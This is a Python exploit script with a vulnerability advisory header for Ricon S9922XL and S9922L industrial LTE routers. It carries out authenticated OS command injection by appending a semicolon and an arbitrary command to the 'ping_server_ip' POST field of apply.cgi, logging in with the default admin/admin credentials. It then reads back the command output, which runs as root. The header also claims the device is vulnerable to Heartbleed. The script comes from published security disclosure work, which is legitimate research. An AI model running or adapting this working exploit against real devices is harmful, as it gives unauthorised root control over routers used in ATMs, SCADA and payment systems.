#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Ricon Industrial Cellular Router S9922XL Remote Command Execution # # # Vendor: Ricon Mobile Inc. # Product web page: https://www.riconmobile.com # Affected version: Model: S9922XL and S9922L # Firmware: 16.10.3 # # Summary: S9922L series LTE router is designed and manufactured by # Ricon Mobile Inc., it based on 3G/LTE cellular network technology # with industrial class quality. With its embedded cellular module, # it widely used in multiple case like ATM connection, remote office # security connection, data collection, etc. # # The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi # and VPN technologies. Powerful 64-bit Processor and integrated real-time # operating system specially developed by Ricon Mobile. S9922XL is # widely used in many areas such as intelligent transportation, scada, # POS, industrial automation, telemetry, finance, environmental protection. # # Desc: The router suffers from an authenticated OS command injection # vulnerability. This can be exploited to inject and execute arbitrary # shell commands as the admin (root) user via the 'ping_server_ip' POST # parameter. Also vulnerable to Heartbleed. # # -------------------------------------------------------------------- # C:\>python ricon.py 192.168.1.71 id # uid=0(admin) gid=0(admin) # -------------------------------------------------------------------- # # Tested on: GNU/Linux 2.6.36 (mips) # WEB-ROUTER # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5653 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php # # # 02.07.2021 # import requests,sys,re if len(sys.argv)<3: print("Ricon Industrial Routers RCE") print("Usage: ./ricon.py [ip] [cmd]") sys.exit(17) else: ipaddr=sys.argv[1] execmd=sys.argv[2] data={'submit_class' :'admin', 'submit_button' :'netTest', 'submit_type' :'', 'action' :'Apply', 'change_action' :'', 'is_ping' :'0', 'ping_server_ip':';'+execmd} htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin')) htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin')) reout=re.search("20\">(.*)",htreq.text,flags=re.S).group(1).strip('\n') print(reout)